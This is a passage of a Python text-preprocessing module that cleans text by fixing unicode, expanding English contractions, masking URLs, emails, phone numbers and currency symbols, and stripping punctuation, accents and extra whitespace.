188 | 189 | def remove_eol_characters(text: str) -> str: 190 | r""" 191 | Remove end of line (\n) char. 192 | 193 | Parameters 194 | ---------- 195 | text : str 196 | 197 | Returns 198 | ------- 199 | str 200 | """ 201 | text = text.replace("\n", " ") 202 | return text 203 | 204 | 205 | def fix_bad_unicode(text: str, normalization: str = "NFC") -> str: 206 | """ 207 | ---- 208 | Copyright 2016 Chartbeat, Inc. 209 | Code from textacy: https://github.com/chartbeat-labs/textacy 210 | ---- 211 | 212 | Fix unicode text that's "broken" using `ftfy 213 | `_; 214 | this includes mojibake, HTML entities and other code cruft, 215 | and non-standard forms for display purposes. 216 | 217 | Parameters 218 | ---------- 219 | text : string 220 | 221 | normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}): 222 | if 'NFC', combines characters and diacritics written using separate 223 | code points, e.g. converting "e" plus an acute accent modifier into 224 | "é"; unicode 225 | can be converted to NFC form without any change in its meaning! 226 | if 'NFKC', additional normalizations are applied that can change 227 | the meanings of characters, e.g. ellipsis characters will be replaced 228 | with three periods 229 | 230 | Returns 231 | ------- 232 | string 233 | """ 234 | text = _fix_text(text, normalization=normalization) 235 | return text 236 | 237 | 238 | def unpack_english_contractions(text: str) -> str: 239 | """ 240 | ---- 241 | Copyright 2016 Chartbeat, Inc. 242 | Code from textacy: https://github.com/chartbeat-labs/textacy 243 | ---- 244 | 245 | Replace *English* contractions in ``text`` str with their unshortened 246 | forms. 247 | N.B. The "'d" and "'s" forms are ambiguous (had/would, is/has/possessive), 248 | so are left as-is. 249 | eg. "You're fired. She's nice." -> "You are fired. She's nice." 250 | 251 | Parameters 252 | ---------- 253 | text : string 254 | 255 | Returns 256 | ------- 257 | string 258 | """ 259 | # standard 260 | text = constants.CONTRACTION_NT_NOT.sub( 261 | r"\1\2 not", 262 | text, 263 | ) 264 | text = constants.CONTRACTION_LL_WILL.sub( 265 | r"\1\2 will", 266 | text, 267 | ) 268 | text = constants.CONTRACTION_RE_ARE.sub(r"\1\2 are", text) 269 | text = constants.CONTRACTION_VE_HAVE.sub( 270 | r"\1\2 have", 271 | text, 272 | ) 273 | text = constants.CONTRACTION_CANT_CANNOT.sub(r"\1\2n not", text) 274 | text = constants.CONTRACTION_M_AM.sub(r"\1\2 am", text) 275 | text = constants.CONTRACTION_LET_LETUS.sub(r"\1\2 us", text) 276 | text = constants.CONTRACTION_WONT_WILLNOT.sub(r"\1\2ill not", text) 277 | text = constants.CONTRACTION_SHANT_SHALLNOT.sub(r"\1\2hall not", text) 278 | text = constants.CONTRACTION_YALL_YOUALL.sub(r"\1\2ou all", text) 279 | return text 280 | 281 | 282 | def replace_urls(text: str, replace_with: str = "*URL*") -> str: 283 | """ 284 | ---- 285 | Copyright 2016 Chartbeat, Inc. 286 | Code from textacy: https://github.com/chartbeat-labs/textacy 287 | ---- 288 | 289 | Replace all URLs in ``text`` str with ``replace_with`` str. 290 | 291 | Parameters 292 | ---------- 293 | text : string 294 | replace_with : string 295 | the string you want the URL to be replaced with. 296 | 297 | Returns 298 | ------- 299 | string 300 | """ 301 | text = constants.URL_REGEX.sub(replace_with, constants.SHORT_URL_REGEX.sub(replace_with, text)) 302 | return text 303 | 304 | 305 | def replace_emails(text: str, replace_with: str = "*EMAIL*") -> str: 306 | """ 307 | ---- 308 | Copyright 2016 Chartbeat, Inc. 309 | Code from textacy: https://github.com/chartbeat-labs/textacy 310 | ---- 311 | 312 | Replace all emails in ``text`` str with ``replace_with`` str 313 | 314 | Parameters 315 | ---------- 316 | text : string 317 | replace_with : string 318 | the string you want the email address to be replaced with. 319 | 320 | Returns 321 | ------- 322 | string 323 | """ 324 | text = constants.EMAIL_REGEX.sub(replace_with, text) 325 | return text 326 | 327 | 328 | def replace_phone_numbers( 329 | text: str, 330 | country_to_detect: List[Optional[str]], 331 | replace_with: str = "*PHONE*", 332 | method: str = "regex", 333 | ) -> str: 334 | """ 335 | ---- 336 | Copyright 2016 Chartbeat, Inc. 337 | Inspired code from textacy: https://github.com/chartbeat-labs/textacy 338 | ---- 339 | 340 | Replace all phone numbers in ``text`` str with ``replace_with`` str 341 | 342 | Parameters 343 | ---------- 344 | text : string 345 | replace_with : string 346 | the string you want the phone number to be replaced with. 347 | method : ['regex','detection'] 348 | regex is faster but will omit a lot of numbers, while detection will 349 | catch every numbers, but takes a while. 350 | country_to_detect : list 351 | If a list of country code is specified, will catch every number 352 | formatted. 353 | Only when method = 'detection'. 354 | 355 | Returns 356 | ------- 357 | string 358 | """ 359 | if method == "regex": 360 | text = constants.PHONE_REGEX.sub(replace_with, text) 361 | elif method == "detection": 362 | found_nums = _extract_phone_numbers(text, countrylist=country_to_detect) 363 | 364 | # order by lenght to avoid truncated numbers to be removed first. 365 | found_nums.sort(key=len, reverse=True) 366 | for phone_number in found_nums: 367 | text = text.replace(phone_number, replace_with) 368 | else: 369 | raise ValueError( 370 | 'Please input a valid method between "regex" or \ 371 | "detection"' 372 | ) 373 | return text 374 | 375 | 376 | def replace_numbers(text: str, replace_with: str = "*NUMBER*") -> str: 377 | """ 378 | ---- 379 | Copyright 2016 Chartbeat, Inc. 380 | Code from textacy: https://github.com/chartbeat-labs/textacy 381 | ---- 382 | 383 | Replace all numbers in ``text`` str with ``replace_with`` str. 384 | 385 | Parameters 386 | ---------- 387 | text : string 388 | replace_with : string 389 | the string you want the number to be replaced with. 390 | 391 | Returns 392 | ------- 393 | string 394 | """ 395 | text = constants.NUMBERS_REGEX.sub(replace_with, text) 396 | return text 397 | 398 | 399 | def replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str: 400 | """ 401 | ---- 402 | Copyright 2016 Chartbeat, Inc. 403 | Code from textacy: https://github.com/chartbeat-labs/textacy 404 | ---- 405 | 406 | Replace all currency symbols in ``text`` str with string specified by 407 | ``replace_with`` str. 408 | 409 | Parameters 410 | ---------- 411 | text : str 412 | raw text 413 | replace_with : None or string 414 | if None (default), replace symbols with 415 | their standard 3-letter abbreviations (e.g. '$' with 'USD', '£' 416 | with 'GBP'); otherwise, pass in a string with which to replace all 417 | symbols (e.g. "*CURRENCY*") 418 | 419 | Returns 420 | ------- 421 | string 422 | """ 423 | if replace_with is None: 424 | for k, v in constants.CURRENCIES.items(): 425 | text = text.replace(k, v) 426 | else: 427 | text = constants.CURRENCY_REGEX.sub(replace_with, text) 428 | return text 429 | 430 | 431 | def remove_punct(text: str, marks: Optional[str] = None) -> str: 432 | """ 433 | Remove punctuation from ``text`` by replacing all instances of ``marks`` 434 | with whitespace. 435 | 436 | Parameters 437 | ---------- 438 | text : str 439 | raw text 440 | 441 | marks : str or None 442 | If specified, remove only the characters in this string, 443 | e.g. ``marks=',;:'`` removes commas, semi-colons, and colons. 444 | Otherwise, all punctuation marks are removed. 445 | 446 | Returns 447 | ------- 448 | string 449 | 450 | Note 451 | ------- 452 | When ``marks=None``, Python's built-in :meth:`str.translate()` is 453 | used to remove punctuation; otherwise, a regular expression is used 454 | instead. The former's performance is about 5-10x faster. 455 | """ 456 | if marks: 457 | text = re.sub(f"[{re.escape(marks)}]+", " ", text, flags=re.UNICODE) 458 | else: 459 | text = text.translate(constants.PUNCT_TRANSLATE_UNICODE) 460 | return text 461 | 462 | 463 | def remove_accents(text: str, method: str = "unicode") -> str: 464 | """ 465 | Remove accents from any accented unicode characters in ``text`` str, 466 | either by transforming them into ascii equivalents or removing them 467 | entirely. 468 | 469 | Parameters 470 | ---------- 471 | text : str 472 | raw text 473 | 474 | method : ({'unicode', 'ascii'}) 475 | if 'unicode', remove accented 476 | char for any unicode symbol with a direct ASCII equivalent; if 'ascii', 477 | remove accented char for any unicode symbol 478 | 479 | NB: the 'ascii' method is notably faster than 'unicode', but less good 480 | 481 | Returns 482 | ------- 483 | string 484 | 485 | Raises 486 | ------ 487 | ValueError 488 | if ``method`` is not in {'unicode', 'ascii'} 489 | """ 490 | if method == "unicode": 491 | text = "".join( 492 | c for c in unicodedata.normalize("NFKD", text) if not unicodedata.combining(c) 493 | ) 494 | elif method == "ascii": 495 | text = unicodedata.normalize("NFKD", text).encode("ascii", errors="ignore").decode("ascii") 496 | else: 497 | msg = f'`method` must be either "unicode" and "ascii", not {method}' 498 | raise ValueError(msg) 499 | return text 500 | 501 | 502 | def remove_multiple_spaces_and_strip_text(text: str) -> str: 503 | """ 504 | Remove multiple spaces, strip text, and remove '-', '*' characters. 505 | 506 | Parameters 507 | ---------- 508 | text : str 509 | the text to be processed 510 | 511 | Returns 512 | ------- 513 | string 514 | the text with removed multiple spaces and strip text 515 | """ 516 | regex_remove_multiple_spaces_list = ["\\t", "[\\s\\-\\*]{2,}"] 517 | for regex_remove_multiple_spaces in regex_remove_multiple_spaces_list: 518 | text = re.sub(regex_remove_multiple_spaces, " ", text) 519 | text = text.strip() 520 | return text 521 | 522 | 523 | def filter_non_latin_characters(text: str) -> str: 524 | """ 525 | Function that filters non latin characters of a text. 526 | 527 | Parameters 528 | ---------- 529 | text : string 530 | 531 | Returns 532 | ------- 533 | string 534 | """ 535 | text = constants.LATIN_CHARACTERS_RE.sub(" ", text) 536 | text = normalize_whitespace(text) 537 | return text 538 | --------------------------------------------------------------------------------